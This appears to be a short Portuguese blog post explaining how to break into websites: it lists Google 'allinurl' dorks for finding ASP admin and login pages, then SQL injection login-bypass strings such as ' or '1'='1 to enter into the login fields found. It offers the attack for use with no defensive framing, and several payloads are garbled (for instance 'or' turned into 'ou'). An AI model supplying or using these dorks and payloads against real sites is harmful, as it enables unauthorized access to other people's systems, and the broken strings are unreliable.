Como Explorar Essa Vulnerabilidade. Abra o Google e Pesquise Por Algumas Dessas Dorks
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
Os Campos De Login Que Vocês Foram Encontrando, Vai Pondo Essas Strings
b' or ' 1='
' or '1
' or '|
' or '1'='1
admin ' - -
' ou 0=0 --
" ou 0=0 --
ou 0=0 --
) ou (' x'='x
' ou 1=1 --
" ou 1=1 --
ou 1=1 --
Porem a Injeção Por Strings Vem Se Tornando Mais Raro a Cada Dia Que Passa, Porem Deixo Essa Dica Ae Pra Vocês....
Nenhum comentário:
Postar um comentário